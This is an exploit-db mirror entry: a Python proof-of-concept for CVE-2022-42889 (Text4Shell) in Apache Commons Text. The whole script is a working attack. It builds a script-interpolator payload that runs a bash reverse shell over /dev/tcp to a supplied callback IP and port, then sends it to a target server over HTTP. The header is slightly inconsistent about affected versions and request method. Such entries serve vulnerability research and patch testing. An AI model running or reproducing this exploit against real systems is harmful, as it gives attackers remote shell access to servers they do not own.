exploit-db-mirror/exploits/multiple/webapps/52261.py

# Exploit Title: Apache Commons Text  1.10.0 - Remote Code Execution
(Text4Shell - POST-based)
# Date: 2025-04-17
# Exploit Author: Arjun Chaudhary
# Vendor Homepage: https://commons.apache.org/proper/commons-text/
# Software Link:https://repo1.maven.org/maven2/org/apache/commons/commons-text/
# Version: Apache Commons Text < 1.10.0
# Tested on: Ubuntu 20.04 (Docker container), Java 11+, Apache Commons Text 1.9
# CVE: CVE-2022-42889
# Type: Remote Code Execution (RCE)
# Method: POST request, script interpolator
# Notes: This exploit demonstrates an RCE vector via POST data, differing
from common GET-based payloads.

#!/usr/bin/env python3

import urllib.parse
import http.client
import sys

def usage():
    print("Usage: python3 text4shell.py <target_ip> <callback_ip> <callback_port>")
    print("Example: python3 text4shell.py 127.0.0.1 192.168.22.128 4444")
    sys.exit(1)

if len(sys.argv) != 4:
    usage()

target_ip = sys.argv[1]
callback_ip = sys.argv[2]
callback_port = sys.argv[3]

raw_payload = (
    f"${{script:javascript:var p=java.lang.Runtime.getRuntime().exec("
    f"['bash','-c','bash -c \\'exec bash -i >& /dev/tcp/{callback_ip}/{callback_port} 0>&1\\''])}}"
)


encoded_payload = urllib.parse.quote(raw_payload)


path = f"/?data={encoded_payload}" # modify the parameter according to your target

print(f"[!] Remember to modify the parameter according to your target")
print(f"[+] Target: http://{target_ip}{path}")
print(f"[+] Payload (decoded): {raw_payload}")


conn = http.client.HTTPConnection(target_ip, 80)
conn.request("POST", path, body="", headers={
    "Host": target_ip,
    "Content-Type": "application/json",
    "Content-Length": "0"
})
response = conn.getresponse()
print(f"[+] Response Status: {response.status}")
print(response.read().decode())
conn.close()